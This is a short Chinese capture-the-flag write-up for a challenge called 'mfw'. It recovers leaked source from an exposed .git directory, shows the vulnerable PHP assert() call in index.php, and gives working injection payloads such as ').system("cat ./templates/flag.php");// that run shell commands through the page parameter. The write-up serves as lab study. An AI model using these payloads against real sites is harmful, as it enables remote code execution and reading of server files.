mfw git泄露构造闭合

这题也挺有想法 第一次确实没有想到

首先我们可以扫出 git

然后

我们githack 泄露一下

然后我们看index.php代码

复制代码
<?php

if (isset($_GET['page'])) {
	$page = $_GET['page'];
} else {
	$page = "home";
}

$file = "templates/" . $page . ".php";

// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");

// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");

问题代码出现在

复制代码
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");

这里的参数是可以闭合的 因为是可控的


我们构造 ')


assert("strpos('')', '..') === false") or die("Detected hacking attempt!");

然后我们可以在后面面接上其他php语句


这里有两个


').system("ls");//


或者

') or system("ls");//

最后payload

就是替换为cat即可

复制代码
/?page=').system("cat ./templates/flag.php");//
相关推荐
锐策1 天前
Git checkout 与 Git reset 核心区别解析(分支与版本关联逻辑)
运维·git
.Shu.1 天前
git实战(7)git常用命令速查表
大数据·git
wniuniu_1 天前
git增加ignore文件
git
Jia-Hui Su1 天前
GDSFactory环境配置(PyCharm+Git+KLayout)
git·python·pycharm
陪我一起学编程1 天前
创建Vue项目的不同方式及项目规范化配置
前端·javascript·vue.js·git·elementui·axios·企业规范
你是我的幸运儿2 天前
git分支命名规范
git
果子⌂2 天前
Git+Jenkins实战(一)
运维·git·jenkins
苦逼IT运维2 天前
Jenkins + SonarQube 从原理到实战四:Jenkins 与 Gerrit 集成并实现自动任务
运维·git·测试工具·ci/cd·jenkins
_童年的回忆_3 天前
Linux下解决Git保存用户名和密码的方法
linux·运维·git
你的人类朋友3 天前
git常见操作整理(持续更新)
前端·git·后端